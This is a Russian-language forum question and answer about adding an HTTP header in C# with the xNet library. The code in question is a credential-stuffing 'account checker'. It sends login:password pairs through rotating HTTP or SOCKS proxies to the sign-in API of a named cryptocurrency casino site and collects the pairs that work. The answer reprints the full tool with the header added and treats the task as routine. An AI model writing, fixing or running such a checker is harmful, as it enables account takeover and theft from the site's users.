# Как Задать параметры (Заголовки) POST запроса?

Tags: c#, xnet, httpwebrequest

Необходимо добавить заголовок в запрос используя средства Xnet c#.
Заголовок:

```
Upgrade-Insecure-Requests:1
```

Код запроса:

```
using (var request = new HttpRequest())
{
    try
    {
        request.Cookies = new CookieDictionary();
        if (cbProxy.Text == "HTTP/s")
            request.Proxy = HttpProxyClient.Parse(Help.GetProxy());
        if (cbProxy.Text == "SOCKS-4")
            request.Proxy = Socks4ProxyClient.Parse(Help.GetProxy());
        if (cbProxy.Text == "SOCKS-5")
            request.Proxy = Socks5ProxyClient.Parse(Help.GetProxy());
        request.ConnectTimeout = (int)numTyam.Value * 1000;
        request.UserAgent = Http.ChromeUserAgent();
        request.AllowAutoRedirect = false;
        request.AddHeader("Accept", "application/json");
        request.AddHeader("Accept-Language", "ru");
        string post_date = "{\"user\":{\"email\":\""+login+"\",\"password\":\""+pass+"\"}}";

        string connect = request.Post("https://www.bitcoincasino.us/api/users/sign_in", post_date, "application/json; charset=UTF-8").ToString();
        if (connect.Contains("auth_fields_missed"))
        {
            DataResult("good", login + ":" + pass, "good");
            textBox1.Text += login + ":" + pass  + Environment.NewLine;
        }
        else if (connect.Contains("Неверный адрес эл. почты или пароль"))
        {
            DataResult("bad", login + ":" + pass, "bad");
        }
        else if (!connect.Contains("auth_fields_missed")) 
        {
            DataResult("bad", login + ":" + pass, "bad");
        }
    }
}
```

Быстрая проверка аккаунтов на работоспособность .
Как передать запрос  ,  я думаю что должно быть что-то вроде:

```
request.AddHeader("Upgrade-Insecure-Requests", "1");
```

Пробовал - но не получается.

Comment: Где? Куда? Покажите код куда вы добавляли этот заголовок? Его необходимо добавлять перед отправкой запроса `POST`.

Comment: Да , его нужно добавлять перед отправкой . а пример  и кусок кода я указал

Answer (score 1):

Исходя из вашего кода, который был приложен к вопросу, можно предположить, что вам необходимо перед данной строкой:

```
string connect = request.Post("https://www.bitcoincasino.us/api/users/sign_in",
    post_date, "application/json; charset=UTF-8").ToString();
```

Добавить то что вам необходимо, в данном случае:

```
request.AddHeader("Upgrade-Insecure-Requests", "1");
```

В результате, получаем такой код:

```
using (var request = new HttpRequest())
{
    try
    {
        request.Cookies = new CookieDictionary();
        if (cbProxy.Text == "HTTP/s")
            request.Proxy = HttpProxyClient.Parse(Help.GetProxy());
        if (cbProxy.Text == "SOCKS-4")
            request.Proxy = Socks4ProxyClient.Parse(Help.GetProxy());
        if (cbProxy.Text == "SOCKS-5")
            request.Proxy = Socks5ProxyClient.Parse(Help.GetProxy());
        request.ConnectTimeout = (int)numTyam.Value * 1000;
        request.UserAgent = Http.ChromeUserAgent();
        request.AllowAutoRedirect = false;
        request.AddHeader("Accept", "application/json");
        request.AddHeader("Accept-Language", "ru");
        string post_date = "{\"user\":{\"email\":\""+login+"\",\"password\":\""+pass+"\"}}";

        // Добавим необходимый заголовок, перед отправкой запроса на сервер.

        request.AddHeader("Upgrade-Insecure-Requests", "1");

        string connect = request.Post("https://www.bitcoincasino.us/api/users/sign_in", post_date, "application/json; charset=UTF-8").ToString();
        if (connect.Contains("auth_fields_missed"))
        {
            DataResult("good", login + ":" + pass, "good");
            textBox1.Text += login + ":" + pass  + Environment.NewLine;
        }
        else if (connect.Contains("Неверный адрес эл. почты или пароль"))
        {
            DataResult("bad", login + ":" + pass, "bad");
        }
        else if (!connect.Contains("auth_fields_missed")) 
        {
            DataResult("bad", login + ":" + pass, "bad");
        }
    }
}
```